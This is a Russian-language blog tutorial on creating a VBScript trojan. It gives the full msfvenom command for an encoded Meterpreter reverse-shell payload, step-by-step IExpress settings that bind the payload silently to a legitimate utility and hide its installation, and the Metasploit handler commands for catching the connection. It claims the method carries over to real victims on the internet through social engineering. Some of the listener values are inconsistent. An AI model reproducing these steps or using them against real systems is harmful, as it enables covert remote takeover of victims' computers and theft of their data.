Как создаётся троян на основе VBScript?

диспетчер задач во время запуска трояна

Те, кто пишет трояны для запуска на удалённом хосте, знают, что, созданный в среде Metasploit, троян можно спрятать очень надёжно. Для продвинутого пользователя запуск Диспетчера задач или его аналога в поисках чего-то непонятного — самая частая задача при работе в Windows. Однако «хороший» троян там и не покажется. Но в этой статье я покажу вам каким образом создать троян на основе VBScript. Как он пишется хакером, и как затем, оказавшись в вашей системе, работает против вас. И чем это может грозить. Здесь я делаю процесс доступным и наглядным с многочисленными для того допущениями.

Лаборатория

  • Кали Линукс — хост-система (хозяйка)
  • Windows 7 — гостевая (у меня установлена 32-х битная версия).

Такой порядок не принципиален: системы могут поменяться местами. Главное — установленное соединение между двумя ОС по локальной сети. Перед созданием трояна хакер определяется с сетевыми адресами, взаимопингуя гостевую и хозяйскую ОС-и:

кали линукс виртуальная windows 7

Таким образом,

  • IP адрес Кали Линукс: 192.168.0.5
  • IP адрес Windows 7: 192.168.0.200

Про что здесь?

Нередко хакеры используют определённый тип файлов, которые операционной системой воспринимаются «близко к сердцу» изначально. На фоне этого антивирусные программы до сих пор неумело определяют или не определяют вообще природу и последствия запуска таких файлов. Да, я про про те самые VBScript-ы. Его мы и возьмём за основу при создании трояна-пэйлоуда, что позволит хакеру с высокой вероятностью обойти встроенную защиту и запуститься на компьютере жертвы максимально незаметно.
После создания трояна хакер использует встроенный в Windows же упаковщик, который «склеит» троян с некой программой.

Во время запуска жертва заметит лишь тот факт, что скачанная им программа не работает и, возможно, просто удалит файл. Однако предшествующих действий будет достаточно, чтобы хакер «заметил» жертву и начал работу.

Допущения

Сразу накидаю вам некоторые из задач, которые нельзя решить исходя из созданных условий, над которыми предлагаю вам поразмыслить самостоятельно, и вероятные решения которых я обещаю показать позже в других статьях.

  • Работаю в локальной сети. А значит, исключён NAT роутеров и процесс проброса портов.
  • В эксперименте не принимает участие обязательный сервис динамического DNS типа No-IP, через который хакер и будет атаковать компьютер жертвы, откровенно не засвечивая свой собственный IP-адрес.
  • В моём эксперименте хакеру уже известен IP-адрес жертвы, что также является серьёзным допущением.
  • Для наглядности процесс в Диспетчере задач Windows виден всем пользователям, чтобы показать трояна во всей красе.
  • По закрытии процесса или завершении работы Windows связь хакера с компьютером жертвы теряется, т.е. перманентное соединение для постэксплойта не создаётся.

Однако. Вопреки вероятным сомнениям, ЛЮБЫЕ указанные выше вопросы при реализации этого способа во внешних сетях (через интернет) решаются успешно. Причём большинство этих решений лежит в плоскости социальной инженерии по схеме “«лох» должен скачать и запустить нужный файл, предварительно засветив свой IP-адрес.

Создание тела трояна

Запускаем среду Метасплойт и вводим команду:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai 62 -f vbs LHOST=192.168.0.5 LPORT=443 > /root/trojan-horse.vbs

где

  • msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai 62 -f vbs – команда кодирования через MSFvenom созданием 32х битной версии пэйлоуда, использующего возможности среды VBScript;
  • LHOST=192.168.0.5 — IP-адрес компьютера хакера
  • LPORT=443 — порт сообщения;
  • trojan-horse.vbs — имя будущего троянского «файла-движка» (название выбрано произвольно).

Пару мгновений — и троянец в папке root Кали хакера. Воспользуемся виртуальной машиной Windows, куда мы просто копируем только что созданный trojan-horse.vbs. Запускаем упаковщик Windows, который замаскирует файл, приклеив его к обычной и знакомой (рекомендуемой) жертве программе. Я воспользуюсь в данном случае первой попавшейся на глаза утилитой Process Explorer, да простит меня её создатель. А в качестве упаковщика используется малоизвестный рядовому пользователю инструмент IExpress. Запускаем его от имени администратора (обязательное условие). Далее смотрим снимки с экрана, и повторяем выставленные чек-боксы окон менеджера упаковщика:

первое окно IExpress

предназначение пакета
попросим “распаковать файлы и запустить команду установки”
название пакета
название пакета пусть будет аналогичным запускаемой утилите
призыв к подтверждению
спрашивать пользователя об установке трояна не стоит
соглашение
лицензии к прочтению и соблюдению у нас также нет…
добавление трояна к пакету
покажем упаковщику местоположение тела трояна…
добавление программы к пакету
… и программы-донора

В поле команды на запуск укажите ту в таком виде (не забывайте про своё имя трояна – у меня он trojan-horse.vbs):

cscript trojan-horse.vbs

команда установки трояна

спрятать окно установки
спрячем окно установки пакета
сообщение по окончании установки
обойдёмся без закрывающего установку сообщения
имя пакета с трояном
имя готового пакета, как оно будет видно перед установкой
нужна ли перезагрузка после установки
перезагрузка операционной системы нам также ни к чему
сохранение директивы
информация по создаваемому пакету сейчас мне тоже не нужна

создание пакета

троян готов

На стороне хакера запускается «прослушка», которая ждёт сеанс соединения с жертвой. Заряжается Metasploit, откуда уже запускаются команды:

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.0.200
lhost => 192.168.200
msf5 exploit(multi/handler) > set lport 443
lport => 443
msf5 exploit(multi/handler) > run

диспетчер задач во время запуска трояна
Обратите внимание на “непонятный” в своём названии екзешник – это и есть наш троян на основе VBScript

Троян на основе VBScript в работе

Запущенный троян в Windows 7 в текущем сеансе совершенно не привлекает внимание пользователя, не отбирая системные ресурсы. Его не видно в списке текущих задач Диспетчера, и действует он из папки с временными файлами

C:\Users\Пользователи\AppData\Local\Temp

В нашем случае его присутствие выдаёт лишь случайно сгенерированный в своём имени исполнительный файл Абракадабра.exe. Между тем хакер приступает к работе. Злоумышленник будет использовать пост-эксплойт – команды, список которых я приведу отдельной статьёй. Сейчас лишь упомяну, что с их помощью хакер чувствует себя вольготно на любой машине под управлением Windows в случае удачного “коннекта” в текущей сессии метерпретера. То есть в нашем случае. Итак, хакер наверняка попытается получить доступ к командной строке:

shell

Переводит имена файлов и директорий на русский. Нажмёт в меню Терминал – Установить кодировку символов – Кириллица (российская) (CP 866). Злоумышленник может теперь свободно гулять по папкам операционной системы, создавая, перемещая и удаляя понравившиеся ему файлы и папки. Может создавать пользователей, изменять настройки реестра и групповой политики, создавать удалённое соединение и т.п. Для этого обычно используются команды, доступные для управления различными системными утилитами из командной консоли. И это будет содержанием следующей статьи блога.

Успехов всем.

 

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

девять + 4 =

Этот сайт использует Akismet для борьбы со спамом. Узнайте как обрабатываются ваши данные комментариев.